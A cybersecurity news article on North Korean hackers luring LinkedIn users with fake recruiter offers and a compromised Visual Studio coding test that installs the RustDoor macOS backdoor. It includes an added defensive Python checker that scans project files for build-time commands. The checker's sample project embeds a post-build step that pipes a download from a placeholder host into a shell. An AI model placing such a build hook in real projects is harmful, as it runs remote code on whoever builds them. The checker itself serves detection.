Sep 16, 2024 | Ravie Lakshmanan | Financial Security / Malware
Cybersecurity experts are sounding the alarm about North Korean hackers targeting individuals on LinkedIn with RustDoor malware.
The recent alert comes from Jamf Threat Labs, which documented an attack where a LinkedIn user was approached by someone posing as a recruiter for a legitimate cryptocurrency exchange called STON.fi.
These malevolent activities are part of a larger campaign by North Korean threat actors to breach networks under the guise of job interviews or coding assignments.
The financial and cryptocurrency industries are prime targets for these state-sponsored hackers, aiming to make illegal profits and achieve their political goals.
These attacks involve sophisticated social engineering tactics, targeting employees in decentralized finance, cryptocurrency, and similar sectors, as outlined by the FBI.
North Korean threat actors employ various techniques, including requesting users to execute code or download applications on company devices or networks.
These malicious activities often include asking individuals to perform coding tests that involve executing unfamiliar scripts or packages.
Recent incidents demonstrate an ongoing evolution in the tools used by hackers against their targets.
The latest attack discovered by Jamf tricks victims into downloading a compromised Visual Studio project as part of a coding challenge, leading to the installation of RustDoor malware.
Researchers have named this malware variant Thiefbucket and note that it has evaded detection by most anti-malware tools.
RustDoor, a macOS backdoor first identified in a cryptocurrency-focused campaign, now appears to be linked to North Korean hackers.
VisualStudioHelper, a component of RustDoor, operates as an information stealer, retrieving specified files after tricking users into entering their system password.
The malware uses two different servers for command and control communications, posing a significant threat to organizations in the crypto industry.
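A defender-side triage check for the lure described above: before a "coding challenge" project is opened or built, inspect its MSBuild project file for anything that runs commands at build time. This is an added example, not Jamf's code or any indicator from the report; the article does not say how the project delivered the payload, so the constructed sample below assumes an MSBuild post-build `Exec` task as the hypothetical mechanism.

```python
"""Triage a Visual Studio project file (.csproj/.vbproj) received as a
coding test, before building it, for build-time command execution.

Assumption (not from the article): build events / Exec tasks are the
mechanism. The sample project and its URL are constructed placeholders.
"""
import xml.etree.ElementTree as ET

# Constructed sample: a normal-looking SDK-style project with a post-build
# step that pipes a download into a shell.
SAMPLE_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net8.0</TargetFramework>
  </PropertyGroup>
  <Target Name="PostBuild" AfterTargets="PostBuildEvent">
    <Exec Command="curl -s http://EXAMPLE-PLACEHOLDER/x.sh | sh" />
  </Target>
</Project>"""

# Elements that execute arbitrary commands during a build, in both the
# SDK-style format (Exec inside a Target) and the legacy format
# (PreBuildEvent/PostBuildEvent text inside a PropertyGroup).
SUSPICIOUS_ELEMENTS = {"Exec", "PreBuildEvent", "PostBuildEvent"}


def find_build_time_execution(csproj_xml: str) -> list[dict]:
    """Return one finding per element that can run a command at build time.

    Each finding records the element tag, the enclosing Target name (None
    for legacy property-based events) and the command text, so a reviewer
    can judge it without ever running the build."""
    root = ET.fromstring(csproj_xml)
    findings = []
    for parent in root.iter():
        parent_tag = parent.tag.split("}")[-1]  # drop legacy xmlns prefix
        for child in parent:
            tag = child.tag.split("}")[-1]
            if tag not in SUSPICIOUS_ELEMENTS:
                continue
            command = child.get("Command") or (child.text or "").strip()
            findings.append({
                "element": tag,
                "target": parent.get("Name") if parent_tag == "Target" else None,
                "command": command,
            })
    return findings


def is_safe_to_open(csproj_xml: str) -> bool:
    """True only when the project declares no build-time command execution."""
    return not find_build_time_execution(csproj_xml)
```

Run it against every project file in an unsolicited archive; any finding means the project should be opened only in an isolated environment, not on a company device.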
It is crucial for businesses to train their employees to be cautious of social media connections requesting software installations and to remain vigilant against sophisticated social engineering tactics employed by threat actors.